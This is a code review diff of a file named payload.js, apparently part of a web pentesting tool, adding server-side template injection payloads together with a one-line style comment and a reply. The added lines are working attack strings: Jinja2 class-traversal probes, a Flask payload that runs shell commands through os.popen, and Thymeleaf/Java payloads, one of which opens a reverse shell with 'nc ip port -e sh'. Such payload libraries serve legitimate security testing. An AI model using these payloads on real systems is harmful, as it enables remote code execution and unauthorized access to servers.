scripts/lib/payload.js

```diff
@@ -135,8 +181,18 @@ window.Payload.LFI = {
 }
 
 window.Payload.SSTI = {
-  flaskRCE: value => {
+  Jinja2:{
+    tuple2Class: value => "{{().__class__.__base__.__subclasses__()}}",
+    string2Class: value => "{{''.__class__.mro()[1].__subclasses__()}}",
+    list2Class: value => "{{[].__class__.__base__.__subclasses__()}}",
+    method2Global: value => "{{foo.__init__.__globals__}}",
+    flaskRCE: value => 
     // Reference: https://twitter.com/realgam3/status/1184747565415358469
-    return "{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}"
+    "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}"
+    // todo : add features to bypass filter keywords like __ '' "" []
+  },
+  Java:{
+    thymeleafRCE: value => '__${T(java.lang.Runtime).getRuntime().exec("nc ip port -e sh")}__::.x',
+    commonRCE:value => "${T(java.lang.Runtime).getRuntime().exec('ls')}"
```

Comment:
A style issue

Space is needed after colon.

Reply:
Fixed now.